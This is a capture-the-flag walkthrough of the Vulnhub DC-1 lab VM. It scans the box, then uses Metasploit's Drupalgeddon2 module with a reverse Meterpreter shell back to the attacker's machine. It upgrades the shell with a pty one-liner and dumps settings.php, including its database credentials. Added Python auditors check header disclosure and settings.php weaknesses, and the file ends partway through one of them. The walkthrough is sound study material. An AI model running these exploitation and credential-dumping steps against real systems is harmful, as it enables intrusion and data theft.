Vulnhub Target Walkthrough: DC1

server/2025/2/12 10:05:21/

Contents

    • Flag1
    • Flag2
    • Flag3
    • Flag4
    • Flag5
    • Summary

└─# arp-scan -l | grep 08:00:27 >> arp-scan.txt
Interface: eth0, type: EN10MB, MAC: 08:00:27:16:61:42, IPv4: 192.168.1.245
192.168.1.183   08:00:27:53:e3:e6       PCS Systemtechnik GmbH
└─# nmap -Pn -A -p- 192.168.1.183 -o nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 14:17 CST
Nmap scan report for 192.168.1.183
Host is up (0.00021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36648/tcp   status
|   100024  1          47546/udp   status
|   100024  1          48623/tcp6  status
|_  100024  1          49914/udp6  status
36648/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:53:E3:E6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.1.183

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.87 seconds

A web service is exposed. It can be fingerprinted with the Wappalyzer browser plugin, or with WhatWeb on Kali:

└─# whatweb -v 192.168.1.183 >> whatweb.txt

┌──(root㉿kali)-[~/Vulnhub/DC1]
└─# cat whatweb.txt 
WhatWeb report for http://192.168.1.183
Status    : 200 OK
Title     : Welcome to Drupal Site | Drupal Site
IP        : 192.168.1.183
Country   : RESERVED, ZZ

Summary   : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

	Version      : 2.2.22 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ Content-Language ]
	Detect the content-language setting from the HTTP header.

	String       : en

[ Drupal ]
	Drupal is an opensource CMS written in PHP. Aggressive function available (check plugin file or details).

	Google Dorks: (1)
	Website     : http://www.drupal.org

[ HTTPServer ]
	HTTP server header string. This plugin also attempts to identify the operating system from the server header.

	OS           : Debian Linux
	String       : Apache/2.2.22 (Debian) (from server string)

[ JQuery ]
	A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX.

	Website     : http://jquery.com/

[ MetaGenerator ]
	This plugin identifies meta generator tags and extracts its value.

	String       : Drupal 7 (http://drupal.org)

[ PHP ]
	PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. This plugin identifies PHP errors, modules and versions and extracts the local file path and username if present.

	Version      : 5.4.45-0+deb7u14
	Google Dorks: (2)
	Website     : http://www.php.net/

[ PasswordField ]
	find password fields

	String       : pass (from field name)

[ Script ]
	This plugin detects instances of script HTML elements and returns the script language/type.

	String       : text/javascript

[ UncommonHeaders ]
	Uncommon HTTP server headers. The blacklist includes all the standard headers and many non standard but common ones. Interesting but fairly common headers should have their own plugins, eg. x-powered-by, server and x-aspnet-version. Info about headers can be found at www.http-stats.com

	String       : x-generator (from headers)

[ X-Powered-By ]
	X-Powered-By HTTP header

	String       : PHP/5.4.45-0+deb7u14 (from x-powered-by string)

HTTP Headers:
	HTTP/1.1 200 OK
	Date: Tue, 11 Feb 2025 06:26:47 GMT
	Server: Apache/2.2.22 (Debian)
	X-Powered-By: PHP/5.4.45-0+deb7u14
	Expires: Sun, 19 Nov 1978 05:00:00 GMT
	Last-Modified: Tue, 11 Feb 2025 06:26:47 +0000
	Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
	ETag: "1739255207"
	Content-Language: en
	X-Generator: Drupal 7 (http://drupal.org)
	Vary: Accept-Encoding
	Content-Encoding: gzip
	Content-Length: 2275
	Connection: close
	Content-Type: text/html; charset=utf-8
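Everything WhatWeb and the nmap robots.txt script reported above came from three response headers and a handful of docroot files. The following script is an added example (not part of the write-up, and not WhatWeb's code) that audits a raw response head and a robots.txt for exactly that disclosure surface; the sample head and robots.txt are constructed from the output shown above, and the remediation hints assume Apache httpd with mod_php.

```python
"""Audit an HTTP response head and a robots.txt for software-stack disclosure.

Added example, not part of the original write-up. Samples are constructed
from the WhatWeb and nmap output for the DC-1 box.
"""
import re

# Constructed sample: the response head WhatWeb reported for DC-1 (trimmed).
DC1_RESPONSE_HEAD = """HTTP/1.1 200 OK
Date: Tue, 11 Feb 2025 06:26:47 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.45-0+deb7u14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Language: en
X-Generator: Drupal 7 (http://drupal.org)
Content-Type: text/html; charset=utf-8
"""

# Constructed sample: the first 15 Disallow entries nmap's http-robots.txt showed.
DC1_ROBOTS = "\n".join("Disallow: " + p for p in [
    "/includes/", "/misc/", "/modules/", "/profiles/", "/scripts/", "/themes/",
    "/CHANGELOG.txt", "/cron.php", "/INSTALL.mysql.txt", "/INSTALL.pgsql.txt",
    "/INSTALL.sqlite.txt", "/install.php", "/INSTALL.txt", "/LICENSE.txt",
    "/MAINTAINERS.txt",
])

# Headers that advertise the stack, with the setting that silences each
# (assumed Apache + mod_php; these are the standard directives).
DISCLOSURE_HEADERS = {
    "server": "Apache: ServerTokens Prod and ServerSignature Off",
    "x-powered-by": "PHP: expose_php = Off in php.ini",
    "x-generator": "Apache mod_headers: Header unset X-Generator",
}

# Files Drupal 7 ships in the docroot that confirm the CMS or its exact release
# (CHANGELOG.txt names the release); remove them after install.
DOCROOT_TXT_FILES = {
    "/CHANGELOG.txt", "/COPYRIGHT.txt", "/INSTALL.txt", "/INSTALL.mysql.txt",
    "/INSTALL.pgsql.txt", "/INSTALL.sqlite.txt", "/LICENSE.txt",
    "/MAINTAINERS.txt", "/README.txt", "/UPGRADE.txt", "/install.php",
}

DOTTED_VERSION_RE = re.compile(r"\d+(?:\.\d+)+")        # 2.2.22, 5.4.45
BARE_MAJOR_RE = re.compile(r"\b[A-Za-z]+[ /](\d+)\b")  # "Drupal 7"


def parse_head(raw):
    """Split a raw HTTP/1.x response head into (status_line, {name.lower(): value})."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def extract_versions(value):
    """Prefer dotted versions; fall back to a bare major number after a product name."""
    dotted = DOTTED_VERSION_RE.findall(value)
    return dotted if dotted else BARE_MAJOR_RE.findall(value)


def audit_disclosure(raw):
    """One finding per disclosure header present, in DISCLOSURE_HEADERS order."""
    _, headers = parse_head(raw)
    findings = []
    for name, remedy in DISCLOSURE_HEADERS.items():
        if name in headers:
            findings.append({"header": name, "value": headers[name],
                             "versions": extract_versions(headers[name]),
                             "remedy": remedy})
    return findings


def audit_robots(robots_txt):
    """Disallow paths that point at release-revealing files still advertised in robots.txt."""
    leaked = []
    for line in robots_txt.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "disallow" and value.strip() in DOCROOT_TXT_FILES:
            leaked.append(value.strip())
    return leaked


if __name__ == "__main__":
    for f in audit_disclosure(DC1_RESPONSE_HEAD):
        print("%-13s %-30s versions=%s\n    fix: %s"
              % (f["header"], f["value"], f["versions"], f["remedy"]))
    print("robots.txt advertises:", audit_robots(DC1_ROBOTS))
```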

Exploiting known vulnerabilities

└─# msfconsole
Metasploit tip: Use the edit command to open the currently active module 
in your editor.

       =[ metasploit v6.4.20-dev                          ]
+ -- --=[ 2440 exploits - 1256 auxiliary - 429 post       ]
+ -- --=[ 1471 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search drupal

Matching Modules
================

   #   Name                                                              Disclosure Date  Rank       Check  Description
   -   ----                                                              ---------------  ----       -----  -----------
   0   exploit/unix/webapp/drupal_coder_exec                             2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1   exploit/unix/webapp/drupal_drupalgeddon2                          2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2     \_ target: Automatic (PHP In-Memory)                            .                .          .      .
   3     \_ target: Automatic (PHP Dropper)                              .                .          .      .
   4     \_ target: Automatic (Unix In-Memory)                           .                .          .      .
   5     \_ target: Automatic (Linux Dropper)                            .                .          .      .
   6     \_ target: Drupal 7.x (PHP In-Memory)                           .                .          .      .
   7     \_ target: Drupal 7.x (PHP Dropper)                             .                .          .      .
   8     \_ target: Drupal 7.x (Unix In-Memory)                          .                .          .      .
   9     \_ target: Drupal 7.x (Linux Dropper)                           .                .          .      .
   10    \_ target: Drupal 8.x (PHP In-Memory)                           .                .          .      .
   11    \_ target: Drupal 8.x (PHP Dropper)                             .                .          .      .
   12    \_ target: Drupal 8.x (Unix In-Memory)                          .                .          .      .
   13    \_ target: Drupal 8.x (Linux Dropper)                           .                .          .      .
   14    \_ AKA: SA-CORE-2018-002                                        .                .          .      .
   15    \_ AKA: Drupalgeddon 2                                          .                .          .      .
   16  exploit/multi/http/drupal_drupageddon                             2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   17    \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method)  .                .          .      .
   18    \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method)   .                .          .      .
   19  auxiliary/gather/drupal_openid_xxe                                2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   20  exploit/unix/webapp/drupal_restws_exec                            2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   21  exploit/unix/webapp/drupal_restws_unserialize                     2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   22    \_ target: PHP In-Memory                                        .                .          .      .
   23    \_ target: Unix In-Memory                                       .                .          .      .
   24  auxiliary/scanner/http/drupal_views_user_enum                     2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   25  exploit/unix/webapp/php_xmlrpc_eval                               2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options  # Required "no" = optional, Required "yes" = must be set

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.245    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.183
rhosts => 192.168.1.183
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options 

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.183    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.245    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

[*] Started reverse TCP handler on 192.168.1.245:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.1.183
# A "Meterpreter session 1 opened" line (the connection from Kali to the target IP) means the exploit succeeded
[*] Meterpreter session 1 opened (192.168.1.245:4444 -> 192.168.1.183:55793) at 2025-02-11 14:56:20 +0800

meterpreter > shell
Process 3238 created.
Channel 0 created.
whoami
www-data
python -V
Python 2.7.3
# upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'

Flag1

www-data@DC-1:/var/www$ ls
ls
COPYRIGHT.txt       LICENSE.txt      cron.php     misc        sites
INSTALL.mysql.txt   MAINTAINERS.txt  flag1.txt    modules     themes
INSTALL.pgsql.txt   README.txt       includes     profiles    update.php
INSTALL.sqlite.txt  UPGRADE.txt      index.php    robots.txt  web.config
INSTALL.txt         authorize.php    install.php  scripts     xmlrpc.php
www-data@DC-1:/var/www$ cat flag1.txt   
cat flag1.txt
Every good CMS needs a config file - and so do you.

Flag2

A quick Baidu search shows the Drupal configuration file is called settings.php and sits at a deep path, so locate and print it in one inline command:

www-data@DC-1:/var/www$ cat `find / -name settings.php`
cat `find / -name settings.php`
<?php
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
$databases = array (
  'default' => array (
    'default' => array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**
 * Access control for update.php script.
 *
 * If you are updating your Drupal installation using the update.php script but
 * are not logged in using either an account with the "Administer software
 * updates" permission or the site maintenance account (the account that was
 * created during installation), you will need to modify the access check
 * statement below. Change the FALSE to a TRUE to disable the access check.
 * After finishing the upgrade, be sure to open this file again and change the
 * TRUE back to a FALSE!
 */
$update_free_access = FALSE;

/**
 * Salt for one-time login links and cancel links, form tokens, etc.
 *
 * This variable will be set to a random value by the installer. All one-time
 * login links will be invalidated if the value is changed. Note that if your
 * site is deployed on a cluster of web servers, you must ensure that this
 * variable has the same value on each server. If this variable is empty, a hash
 * of the serialized database credentials will be used as a fallback salt.
 *
 * For enhanced security, you may set this variable to a value using the
 * contents of a file outside your docroot that is never saved together
 * with any backups of your Drupal files and database.
 *
 * Example:
 *   $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
 *
 */
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';

/**
 * Base URL (optional).
 *
 * If Drupal is generating incorrect URLs on your site, which could
 * be in HTML headers (links to CSS and JS files) or visible links on pages
 * (such as in menus), uncomment the Base URL statement below (remove the
 * leading hash sign) and fill in the absolute URL to your Drupal installation.
 *
 * You might also want to force users to use a given domain.
 * See the .htaccess file for more information.
 *
 * Examples:
 *   $base_url = 'http://www.example.com';
 *   $base_url = 'http://www.example.com:8888';
 *   $base_url = 'http://www.example.com/drupal';
 *   $base_url = 'https://www.example.com:8888/drupal';
 *
 * It is not allowed to have a trailing slash; Drupal will add it
 * for you.
 */
# $base_url = 'http://www.example.com';  // NO trailing slash!

/**
 * PHP settings:
 *
 * To see what PHP settings are possible, including whether they can be set at
 * runtime (by using ini_set()), read the PHP documentation:
 * http://www.php.net/manual/en/ini.list.php
 * See drupal_environment_initialize() in includes/bootstrap.inc for required
 * runtime settings and the .htaccess file for non-runtime settings. Settings
 * defined there should not be duplicated here so as to avoid conflict issues.
 */

/**
 * Some distributions of Linux (most notably Debian) ship their PHP
 * installations with garbage collection (gc) disabled. Since Drupal depends on
 * PHP's garbage collection for clearing sessions, ensure that garbage
 * collection occurs by using the most common settings.
 */
ini_set('session.gc_probability', 1);
ini_set('session.gc_divisor', 100);

/**
 * Set session lifetime (in seconds), i.e. the time from the user's last visit
 * to the active session may be deleted by the session garbage collector. When
 * a session is deleted, authenticated users are logged out, and the contents
 * of the user's $_SESSION variable is discarded.
 */
ini_set('session.gc_maxlifetime', 200000);

/**
 * Set session cookie lifetime (in seconds), i.e. the time from the session is
 * created to the cookie expires, i.e. when the browser is expected to discard
 * the cookie. The value 0 means "until the browser is closed".
 */
ini_set('session.cookie_lifetime', 2000000);

/**
 * If you encounter a situation where users post a large amount of text, and
 * the result is stripped out upon viewing but can still be edited, Drupal's
 * output filter may not have sufficient memory to process it.  If you
 * experience this issue, you may wish to uncomment the following two lines
 * and increase the limits of these variables.  For more information, see
 * http://php.net/manual/en/pcre.configuration.php.
 */
# ini_set('pcre.backtrack_limit', 200000);
# ini_set('pcre.recursion_limit', 200000);

/**
 * Drupal automatically generates a unique session cookie name for each site
 * based on its full domain name. If you have multiple domains pointing at the
 * same Drupal site, you can either redirect them all to a single domain (see
 * comment in .htaccess), or uncomment the line below and specify their shared
 * base domain. Doing so assures that users remain logged in as they cross
 * between your various domains. Make sure to always start the $cookie_domain
 * with a leading dot, as per RFC 2109.
 */
# $cookie_domain = '.example.com';

/**
 * Variable overrides:
 *
 * To override specific entries in the 'variable' table for this site,
 * set them here. You usually don't need to use this feature. This is
 * useful in a configuration file for a vhost or directory, rather than
 * the default settings.php. Any configuration setting from the 'variable'
 * table can be given a new value. Note that any values you provide in
 * these variable overrides will not be modifiable from the Drupal
 * administration interface.
 *
 * The following overrides are examples:
 * - site_name: Defines the site's name.
 * - theme_default: Defines the default theme for this site.
 * - anonymous: Defines the human-readable name of anonymous users.
 * Remove the leading hash signs to enable.
 */
# $conf['site_name'] = 'My Drupal site';
# $conf['theme_default'] = 'garland';
# $conf['anonymous'] = 'Visitor';

/**
 * A custom theme can be set for the offline page. This applies when the site
 * is explicitly set to maintenance mode through the administration page or when
 * the database is inactive due to an error. It can be set through the
 * 'maintenance_theme' key. The template file should also be copied into the
 * theme. It is located inside 'modules/system/maintenance-page.tpl.php'.
 * Note: This setting does not apply to installation and update pages.
 */
# $conf['maintenance_theme'] = 'bartik';

/**
 * Reverse Proxy Configuration:
 *
 * Reverse proxy servers are often used to enhance the performance
 * of heavily visited sites and may also provide other site caching,
 * security, or encryption benefits. In an environment where Drupal
 * is behind a reverse proxy, the real IP address of the client should
 * be determined such that the correct client IP address is available
 * to Drupal's logging, statistics, and access management systems. In
 * the most simple scenario, the proxy server will add an
 * X-Forwarded-For header to the request that contains the client IP
 * address. However, HTTP headers are vulnerable to spoofing, where a
 * malicious client could bypass restrictions by setting the
 * X-Forwarded-For header directly. Therefore, Drupal's proxy
 * configuration requires the IP addresses of all remote proxies to be
 * specified in $conf['reverse_proxy_addresses'] to work correctly.
 *
 * Enable this setting to get Drupal to determine the client IP from
 * the X-Forwarded-For header (or $conf['reverse_proxy_header'] if set).
 * If you are unsure about this setting, do not have a reverse proxy,
 * or Drupal operates in a shared hosting environment, this setting
 * should remain commented out.
 *
 * In order for this setting to be used you must specify every possible
 * reverse proxy IP address in $conf['reverse_proxy_addresses'].
 * If a complete list of reverse proxies is not available in your
 * environment (for example, if you use a CDN) you may set the
 * $_SERVER['REMOTE_ADDR'] variable directly in settings.php.
 * Be aware, however, that it is likely that this would allow IP
 * address spoofing unless more advanced precautions are taken.
 */
# $conf['reverse_proxy'] = TRUE;

/**
 * Specify every reverse proxy IP address in your environment.
 * This setting is required if $conf['reverse_proxy'] is TRUE.
 */
# $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);

/**
 * Set this value if your proxy server sends the client IP in a header
 * other than X-Forwarded-For.
 */
# $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';

/**
 * Page caching:
 *
 * By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page
 * views. This tells a HTTP proxy that it may return a page from its local
 * cache without contacting the web server, if the user sends the same Cookie
 * header as the user who originally requested the cached page. Without "Vary:
 * Cookie", authenticated users would also be served the anonymous page from
 * the cache. If the site has mostly anonymous users except a few known
 * editors/administrators, the Vary header can be omitted. This allows for
 * better caching in HTTP proxies (including reverse proxies), i.e. even if
 * clients send different cookies, they still get content served from the cache.
 * However, authenticated users should access the site directly (i.e. not use an
 * HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid
 * getting cached pages from the proxy.
 */
# $conf['omit_vary_cookie'] = TRUE;

/**
 * CSS/JS aggregated file gzip compression:
 *
 * By default, when CSS or JS aggregation and clean URLs are enabled Drupal will
 * store a gzip compressed (.gz) copy of the aggregated files. If this file is
 * available then rewrite rules in the default .htaccess file will serve these
 * files to browsers that accept gzip encoded content. This allows pages to load
 * faster for these users and has minimal impact on server load. If you are
 * using a webserver other than Apache httpd, or a caching reverse proxy that is
 * configured to cache and compress these files itself you may want to uncomment
 * one or both of the below lines, which will prevent gzip files being stored.
 */
# $conf['css_gzip_compression'] = FALSE;
# $conf['js_gzip_compression'] = FALSE;

/**
 * String overrides:
 *
 * To override specific strings on your site with or without enabling the Locale
 * module, add an entry to this list. This functionality allows you to change
 * a small number of your site's default English language interface strings.
 *
 * Remove the leading hash signs to enable.
 */
# $conf['locale_custom_strings_en'][''] = array(
#   'forum'      => 'Discussion board',
#   '@count min' => '@count minutes',
# );

/**
 *
 * IP blocking:
 *
 * To bypass database queries for denied IP addresses, use this setting.
 * Drupal queries the {blocked_ips} table by default on every page request
 * for both authenticated and anonymous users. This allows the system to
 * block IP addresses from within the administrative interface and before any
 * modules are loaded. However on high traffic websites you may want to avoid
 * this query, allowing you to bypass database access altogether for anonymous
 * users under certain caching configurations.
 *
 * If using this setting, you will need to add back any IP addresses which
 * you may have blocked via the administrative interface. Each element of this
 * array represents a blocked IP address. Uncommenting the array and leaving it
 * empty will have the effect of disabling IP blocking on your site.
 *
 * Remove the leading hash signs to enable.
 */
# $conf['blocked_ips'] = array(
#   'a.b.c.d',
# );

/**
 * Fast 404 pages:
 *
 * Drupal can generate fully themed 404 pages. However, some of these responses
 * are for images or other resource files that are not displayed to the user.
 * This can waste bandwidth, and also generate server load.
 *
 * The options below return a simple, fast 404 page for URLs matching a
 * specific pattern:
 * - 404_fast_paths_exclude: A regular expression to match paths to exclude,
 *   such as images generated by image styles, or dynamically-resized images.
 *   If you need to add more paths, you can add '|path' to the expression.
 * - 404_fast_paths: A regular expression to match paths that should return a
 *   simple 404 page, rather than the fully themed 404 page. If you don't have
 *   any aliases ending in htm or html you can add '|s?html?' to the expression.
 * - 404_fast_html: The html to return for simple 404 pages.
 *
 * Add leading hash signs if you would like to disable this functionality.
 */
$conf['404_fast_paths_exclude'] = '/\/(?:styles)\//';
$conf['404_fast_paths'] = '/\.(?:txt|png|gif|jpe?g|css|js|ico|swf|flv|cgi|bat|pl|dll|exe|asp)$/i';
$conf['404_fast_html'] = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "@path" was not found on this server.</p></body></html>';

/**
 * By default the page request process will return a fast 404 page for missing
 * files if they match the regular expression set in '404_fast_paths' and not
 * '404_fast_paths_exclude' above. 404 errors will simultaneously be logged in
 * the Drupal system log.
 *
 * You can choose to return a fast 404 page earlier for missing pages (as soon
 * as settings.php is loaded) by uncommenting the line below. This speeds up
 * server response time when loading 404 error pages and prevents the 404 error
 * from being logged in the Drupal system log. In order to prevent valid pages
 * such as image styles and other generated content that may match the
 * '404_fast_html' regular expression from returning 404 errors, it is necessary
 * to add them to the '404_fast_paths_exclude' regular expression above. Make
 * sure that you understand the effects of this feature before uncommenting the
 * line below.
 */
# drupal_fast_404();

/**
 * External access proxy settings:
 *
 * If your site must access the Internet via a web proxy then you can enter
 * the proxy settings here. Currently only basic authentication is supported
 * by using the username and password variables. The proxy_user_agent variable
 * can be set to NULL for proxies that require no User-Agent header or to a
 * non-empty string for proxies that limit requests to a specific agent. The
 * proxy_exceptions variable is an array of host names to be accessed directly,
 * not via proxy.
 */
# $conf['proxy_server'] = '';
# $conf['proxy_port'] = 8080;
# $conf['proxy_username'] = '';
# $conf['proxy_password'] = '';
# $conf['proxy_user_agent'] = '';
# $conf['proxy_exceptions'] = array('127.0.0.1', 'localhost');

/**
 * Authorized file system operations:
 *
 * The Update manager module included with Drupal provides a mechanism for
 * site administrators to securely install missing updates for the site
 * directly through the web user interface. On securely-configured servers,
 * the Update manager will require the administrator to provide SSH or FTP
 * credentials before allowing the installation to proceed; this allows the
 * site to update the new files as the user who owns all the Drupal files,
 * instead of as the user the webserver is running as. On servers where the
 * webserver user is itself the owner of the Drupal files, the administrator
 * will not be prompted for SSH or FTP credentials (note that these server
 * setups are common on shared hosting, but are inherently insecure).
 *
 * Some sites might wish to disable the above functionality, and only update
 * the code directly via SSH or FTP themselves. This setting completely
 * disables all functionality related to these authorized file operations.
 *
 * @see http://drupal.org/node/244924
 *
 * Remove the leading hash signs to disable.
 */
# $conf['allow_authorize_operations'] = FALSE;
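The flag2 hint is the real lesson of this step: the database credentials sit in plaintext in a file the web-server user can read, so any code execution as www-data hands them over. The following script is an added example (not from the write-up, and not Drupal's own code) that audits a Drupal 7 settings.php for that and the neighbouring weak spots shown above: a privileged DB account, $update_free_access left TRUE, an inline hash salt, and loose file mode or ownership. The settings text is constructed from the file above; the mode and owner values are assumed inputs the caller takes from stat().

```python
"""Audit a Drupal 7 settings.php for the weaknesses the DC-1 flag2 step relies on.

Added example, not part of the original write-up or of Drupal. The checks follow
Drupal's own advice: files owned by a non-web user, settings.php 440 root:www-data,
a scoped DB account, $update_free_access FALSE, and the hash salt kept outside the docroot.
"""
import re
import stat

# Constructed sample: the relevant lines of the DC-1 settings.php shown in the write-up.
DC1_SETTINGS = """<?php
/**
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 */
$databases = array (
  'default' => array (
    'default' => array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
$update_free_access = FALSE;
$drupal_hash_salt = 'X8gdX7OdYRiBnlHoj0ukhtZ7eO4EDrvMkhN21SWZocs';
"""

DB_FIELD_RE = re.compile(r"'(database|username|password|host|driver)'\s*=>\s*'([^']*)'")
UPDATE_FREE_RE = re.compile(r"^\s*\$update_free_access\s*=\s*(TRUE|FALSE)\s*;", re.M | re.I)
SALT_INLINE_RE = re.compile(r"^\s*\$drupal_hash_salt\s*=\s*'([^']+)'\s*;", re.M)
SALT_FILE_RE = re.compile(r"^\s*\$drupal_hash_salt\s*=\s*file_get_contents\(", re.M)
PRIVILEGED_DB_USERS = {"root", "admin", "mysql"}


def parse_database(text):
    """Return the default connection fields from the $databases array (empty dict if absent)."""
    m = re.search(r"\$databases\s*=\s*array\s*\((.*?)\);", text, re.S)
    return dict(DB_FIELD_RE.findall(m.group(1))) if m else {}


def audit_settings(text, mode=None, owner=None, web_user="www-data"):
    """Return a list of (severity, message) findings for a settings.php body.

    mode is the file's st_mode and owner its owning user name, when the caller
    has them; both are optional so the text alone can be audited.
    """
    findings = []
    db = parse_database(text)
    if db.get("password"):
        findings.append(("info", "plaintext DB password for '%s'; anyone who can read this "
                         "file can log in to MySQL as that account" % db.get("username")))
    if db.get("username") in PRIVILEGED_DB_USERS:
        findings.append(("high", "DB account '%s' is a privileged account" % db["username"]))
    m = UPDATE_FREE_RE.search(text)
    if m and m.group(1).upper() == "TRUE":
        findings.append(("high", "$update_free_access = TRUE lets unauthenticated users run update.php"))
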